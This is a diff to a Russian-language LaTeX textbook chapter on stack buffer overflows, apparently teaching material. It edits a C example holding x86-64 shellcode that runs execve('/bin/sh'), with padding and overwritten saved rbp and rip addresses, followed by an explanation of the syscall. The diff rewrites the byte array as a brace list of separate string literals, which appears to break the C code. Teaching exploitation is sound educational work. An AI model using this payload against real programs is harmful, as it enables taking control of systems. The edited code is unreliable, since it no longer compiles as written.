--- a/stack_overflow.tex
+++ b/stack_overflow.tex
@@ -108,30 +108,31 @@ Hamming: 8
 int main() {
   char text[68] =
     // 28 байтов исполняемого кода
-    "\x90" "\x90" "\x90"                // nop; nop; nop
-    "\x48\x31" "\xD2"                   // xor %rdx, %rdx
-    "\x48\x31" "\xF6"                   // xor %rsi, %rsi
-    "\x48\xBF" "\xDC\xEA\xFF\xFF"
-    "\xFF\x7F\x00\x00"                  // mov $0x7fffffffeadc,
+   {"\x90", "\x90", "\x90",                // nop; nop; nop
+    "\x48\x31", "\xD2",                   // xor %rdx, %rdx
+    "\x48\x31", "\xF6",                   // xor %rsi, %rsi
+    "\x48\xBF" "\xDC\xEA\xFF\xFF",
+    "\xFF\x7F\x00\x00",                  // mov $0x7fffffffeadc,
                                         //   %rdi
-    "\x48\xC7\xC0" "\x3B\x00\x00\x00"   // mov $0x3b, %rax
-    "\x0F\x05"                          // syscall
+    "\x48\xC7\xC0", "\x3B\x00\x00\x00",   // mov $0x3b, %rax
+    "\x0F\x05",                          // syscall
     // 8 байтов строки /bin/sh
-    "\x2F\x62\x69\x6E\x2F\x73\x68\x00"  // "/bin/sh\0"
+    "\x2F\x62\x69\x6E\x2F\x73\x68\x00",  // "/bin/sh\0"
     // 12 байтов заполнения и 16 байтов новых
     // значений сохранённых регистров
-    "\x00\x00\x00\x00"                  // незанятые байты
-    "\x00\x00\x00\x00"                  // unsigned distance
-    "\x00\x00\x00\x00"                  // unsigned diff
-    "\x50\xEB\xFF\xFF"                  // регистр
-    "\xFF\x7F\x00\x00"                  //   rbp=0x7fffffffeb50
-    "\xC0\xEA\xFF\xFF"                  // регистр
-    "\xFF\x7F\x00\x00"                  //   rip=0x7fffffffeac0
+    "\x00\x00\x00\x00",                  // незанятые байты
+    "\x00\x00\x00\x00",                 // unsigned distance
+    "\x00\x00\x00\x00",                  // unsigned diff
+    "\x50\xEB\xFF\xFF",                  // регистр
+    "\xFF\x7F\x00\x00",                  //   rbp=0x7fffffffeb50
+    "\xC0\xEA\xFF\xFF",                  // регистр
+    "\xFF\x7F\x00\x00"}                  //   rip=0x7fffffffeac0
     ;
   ...
   return hamming_distance(b1, b2, text, 68);
   ...
 }
+...
 \end{verbatim} }
 
 Код эквивалентен вызову функции \texttt{execve(``/bin/sh'', 0 0)} через системный вызов функции ядра Linux для запуска оболочки среды \texttt{/bin/sh}. При системном вызове нужно записать в регистр \texttt{rax} номер системной функции, а в другие регистры процессора -- аргументы. Данный системный вызов с номером \texttt{0x3b} требует в качестве аргументов регистры \texttt{rdi} с адресом строки исполняемой программы, \texttt{rsi} и \texttt{rdx} с адресами строк параметров запускаемой программы и переменных среды. В примере в \texttt{rdi} записывается адрес \texttt{0x7fffffffeadc}, который указывает на строку \texttt{``/bin/sh''} в стеке после копирования. Регистры \texttt{rdx} и \texttt{rsi} обнуляются.
